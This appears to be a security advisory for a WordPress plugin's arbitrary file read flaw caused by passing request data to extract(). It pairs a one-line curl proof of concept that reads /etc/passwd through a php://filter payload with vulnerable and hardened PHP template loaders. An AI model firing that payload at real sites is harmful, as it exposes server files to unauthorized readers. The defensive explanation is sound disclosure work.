The plugin does not validate a parameter passed to the PHP extract() function when loading templates, allowing an unauthenticated attacker to override the template path and read arbitrary files from the host's file system.
curl 'https://example.com/wp-admin/admin-ajax.php' \
  -d 'action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=/etc/passwd'
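The pattern described above, next to a hardened loader, as an added example that is not the plugin's own code. The function names, the templates/ directory and the allow-listed template names are assumptions made for illustration.

```php
<?php
// Added illustration. Function names, directory layout and template names
// are hypothetical and are not taken from the plugin's source.

// Vulnerable pattern: extract() on request-supplied data overwrites any local
// variable with a matching key, including the one that is later include()d.
function render_vulnerable(array $options): string
{
    $template = __DIR__ . '/templates/pagination.php'; // intended path
    extract($options);   // a request key named "template" replaces $template
    ob_start();
    include $template;   // path, or stream wrapper, now chosen by the caller
    return (string) ob_get_clean();
}

// Hardened form: no extract(), allow-listed template name, resolved path
// confined to the template directory, data passed as a single array.
function render_hardened(array $options): string
{
    $allowed = ['pagination', 'list-item'];            // assumed template names
    $name    = $options['template'] ?? 'pagination';
    if (!is_string($name) || !in_array($name, $allowed, true)) {
        throw new InvalidArgumentException('Unknown template');
    }

    // realpath() returns false for stream wrappers such as php://filter and
    // resolves ../ sequences, so the prefix check runs on the real location.
    $base = realpath(__DIR__ . '/templates');
    $path = $base === false ? false : realpath($base . '/' . $name . '.php');
    if ($path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('Template not inside template directory');
    }

    // The template reads $params['key']; request keys can no longer shadow
    // $path or any other local because nothing is extracted into scope.
    $params = array_diff_key($options, ['template' => true]);
    $render = static function (string $__path, array $params): string {
        ob_start();
        include $__path;
        return (string) ob_get_clean();
    };
    return $render($path, $params);
}
```

If existing templates depend on extracted variables, calling extract() with the EXTR_SKIP flag and only after the path has been resolved and validated keeps request keys from replacing locals that are already set.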
2023-01-25 (about 4 months ago)
2023-01-23 (about 4 months ago)
2023-01-23 (about 4 months ago)